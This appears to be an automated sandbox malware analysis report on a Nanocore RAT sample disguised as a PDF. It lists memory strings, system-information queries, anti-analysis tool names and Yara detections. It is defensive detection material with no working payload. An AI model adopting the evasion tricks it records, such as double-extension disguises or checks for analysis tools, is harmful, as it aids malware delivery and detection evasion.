Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007382000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000000.358747295.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.0000000003872000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerH
Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager&
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.586667731.00000000075DC000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: itugx.exe	Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager8W
Source: itugx.exe, 00000005.00000003.451315387.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452100532.0000000001510000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451193951.00000000014F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerm,
Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managera
Source: itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: itugx.exe, 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462582507.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: inGetText("Program Manager") = "0" Then
Source: rnnsh.xls.0.dr	Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager\2
Source: itugx.exe, 00000017.00000003.535781769.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534401259.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.539266088.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager*;
Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If WinGetText("Program Manager") = "0" Then$
Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003802000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerD$Fp

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00CDAF0F

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CDF654 cpuid

0_2_00CDF654

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

0_2_00CDDF1E

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0034BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

2_2_0034BCF2

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0036E5F8 GetUserNameW,

2_2_0036E5F8

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CCB146 GetVersionExW,

0_2_00CCB146

AV process strings found (often used to terminate AV products)

Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information

Yara detected Nanocore RAT

Source: Yara match	File source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
